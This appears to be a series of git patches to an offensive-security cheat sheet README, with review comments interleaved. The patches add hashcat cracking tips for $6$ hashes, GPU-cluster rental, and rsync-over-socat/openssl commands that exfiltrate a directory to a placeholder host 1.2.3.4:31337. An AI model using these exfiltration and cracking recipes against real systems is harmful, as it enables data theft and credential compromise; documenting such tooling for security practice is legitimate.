@@ -759,8 +759,13 @@ curl -fsSL https://github.com/sean-t-smith/Extreme_Breach_Masks/raw/main/10%2010 # -w1 == workload low (-w3 == high) nice -n 19 hashcat -o cracked.txt my-hash.txt -w1 -a3 10-days_7-16.hcmask -O -d2 ``` +Read the [FAQ](https://hashcat.net/wiki/doku.php?id=frequently_asked_questions). -Read the [FAQ](https://hashcat.net/wiki/doku.php?id=frequently_asked_questions) or use [Crackstation](https://crackstation.net), [shuck.sh](https://shuck.sh/), [ColabCat/cloud](https://github.com/someshkar/colabcat)/[Cloudtopolis](https://github.com/JoelGMSec/Cloudtopolis) or crack on your own [AWS](https://akimbocore.com/article/hashcracking-with-aws/). +Be aware that `$6$` hashes are SLOW. Even the [1-minute 7-16 char hashmask](https://github.com/sean-t-smith/Extreme_Breach_Masks/raw/main/01%20instant_1-minute/1-minute_7-16.hcmask) would take many days on a 8xRTX4090 cluster to complete. + +Rent a GPU-Cluster at [vast.ai](https://www.vast.ai) and use [dizcza/docker-hashcat](https://hub.docker.com/r/dizcza/docker-hashcat) ([read more](https://adamsvoboda.net/password-cracking-in-the-cloud-with-hashcat-vastai/)). + +Otherwise, use [Crackstation](https://crackstation.net), [shuck.sh](https://shuck.sh/), [ColabCat/cloud](https://github.com/someshkar/colabcat)/[Cloudtopolis](https://github.com/JoelGMSec/Cloudtopolis) or crack on your own [AWS](https://akimbocore.com/article/hashcracking-with-aws/) instances. **3.xi. Brute Force Passwords / Keys** From 900bb69c7ff4fc4a16ec46c20e45992a46ab3ab7 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Mon, 19 Feb 2024 00:18:17 +0000 Subject: [PATCH 22/25] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index a9f00f6..a496ed4 100644 --- a/README.md +++ b/README.md 
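Review bot: "on a 8xRTX4090 cluster" should be "on an 8xRTX4090 cluster". The new caveat that `$6$` hashes make even the 1-minute mask take "many days" is useful but gives no basis; one clause explaining that sha512crypt's 5000 default rounds make every guess thousands of times more expensive than a raw hash would let readers scale the estimate to their own hardware, and it is the same reason slow hashes are recommended on the defending side.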
@@ -1071,7 +1071,7 @@ gs-netcat >"FILENAME" # When prompted, enter the SECRET from the sender #### Download from Server to Receiver: ```sh ## Spawn a temporary HTTP server and share the current working directory. -python -m http.server 8080 +python -m http.server 8080 # --bind 127.0.0.1 ``` ```sh From a8fd199ac9fa2b3489c5c6797246b61a36b6ccf3 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Tue, 20 Feb 2024 16:25:58 +0000 Subject: [PATCH 23/25] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index a496ed4..064817d 100644 --- a/README.md +++ b/README.md @@ -751,7 +751,7 @@ HashCat is our go-to tool for everything else: hashcat my-hash /usr/share/wordlists/rockyou.txt ``` -Or using a [10-days 7-16 char hashmask](https://github.com/sean-t-smith/Extreme_Breach_Masks/raw/main/10%2010-days/10-days_7-16.hcmask) on GPU: +Or using a [10-days 7-16 char hashmask](https://github.com/sean-t-smith/Extreme_Breach_Masks/) on GPU: ```sh curl -fsSL https://github.com/sean-t-smith/Extreme_Breach_Masks/raw/main/10%2010-days/10-days_7-16.hcmask -o 10-days_7-16.hcmask # -d2 == Use GPU #2 only (device #2) From bb9ecb4161f1fb1b5a87ccc311768e93103d453e Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Tue, 20 Feb 2024 16:34:15 +0000 Subject: [PATCH 24/25] Update README.md --- README.md | 8 ++++++-- 1 file changed, 6 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 064817d..03f8cae 100644 --- a/README.md +++ b/README.md 
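Review bot: the `# --bind 127.0.0.1` comment on `python -m http.server 8080` shows the flag but not why it matters; spell out that without it the server listens on all interfaces and serves the current directory to anyone who can reach the host, so the loopback bind is the safe default unless the download really must come from another machine.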
@@ -1170,13 +1170,15 @@ socat OPENSSL-LISTEN:31337,reuseaddr,fork,cert=ssl.pem,cafile=ssl.pem EXEC:"rsyn Sender: ```posh # Copy the ssl.pem from the Receiver to the Sender and send directory named 'warez' +IP=1.2.3.4 +PORT=31337 # Using rsync + socat-ssl up1() { - rsync -ahPRv -e "bash -c 'socat - OPENSSL-CONNECT:1.2.3.4:31337,cert=ssl.pem,cafile=ssl.pem,verify=0' #" -- "$@" 0: + rsync -ahPRv -e "bash -c 'socat - OPENSSL-CONNECT:${IP:?}:${PORT:-31337},cert=ssl.pem,cafile=ssl.pem,verify=0' #" -- "$@" 0: } # Using rsync + openssl up2() { - rsync -ahPRv -e "bash -c 'openssl s_client -connect 1.2.3.4:31337 -servername example.com -cert ssl.pem -CAfile ssl.pem -quiet 2>/dev/null' #" -- "$@" 0: + rsync -ahPRv -e "bash -c 'openssl s_client -connect ${IP:?}:${PORT:-31337} -servername example.com -cert ssl.pem -CAfile ssl.pem -quiet 2>/dev/null' #" -- "$@" 0: } up1 /var/www/./warez up2 /var/www/./warez @@ -1185,6 +1187,8 @@ up2 /var/www/./warez Rsync can be combined to exfil via [https / cloudflared raw TCP tunnels](https://iq.thc.org/tunnel-via-cloudflare-to-any-tcp-service). (To exfil from Windows, use the rsync.exe from the [gsocket windows package](https://github.com/hackerschoice/binary/raw/main/gsocket/bin/gs-netcat_x86_64-cygwin_full.zip)). A noisier solution is [syncthing](https://syncthing.net/). +Pro Tip: Lazy hackers just type `exfil` on segfault.net. + --- ### 4.ix. File transfer - using WebDAV From fe895c5bde1af4231e39558e0948a2fa6ba5491a Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Tue, 20 Feb 2024 16:35:48 +0000 Subject: [PATCH 25/25] Update README.md --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index 03f8cae..bcda80c 100644 --- a/README.md +++ b/README.md 
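Review bot: `IP=1.2.3.4` and `PORT=31337` are assigned unconditionally two lines above the functions, so `${IP:?}` can never fire and `${PORT:-31337}` never falls back; either drop the assignments and make the variables parameters the reader sets (matching the `DSTIP=`/`DPORT=` convention in the port-forward section), or use plain `${IP}`/`${PORT}`. The two expansions are also inconsistent with each other (`:?` versus `:-`); pick one form for both.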
@@ -1159,6 +1159,7 @@ The same encrypted (OpenSSL): Receiver: ```posh +# use rsa:2048 if ed25519 is not supported (e.g. rsync connection error) openssl req -subj '/CN=example.com/O=EL/C=XX' -new -newkey ed25519 -days 14 -nodes -x509 -keyout ssl.key -out ssl.crt cat ssl.key ssl.crt >ssl.pem rm -f ssl.key ssl.crt
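Review bot: the new comment says to fall back to `rsa:2048` "if ed25519 is not supported (e.g. rsync connection error)", but an rsync connection error is a generic symptom that equally covers a wrong IP or port, a firewall, or a socat verify failure; name the actual check instead: `openssl version` must report 1.1.1 or later on both ends, and the listener's socat must be linked against such an OpenSSL. Since `openssl req -newkey ed25519` fails immediately on an older Receiver, the comment is really about an older Sender whose `s_client` or socat cannot negotiate an Ed25519 certificate; say that explicitly.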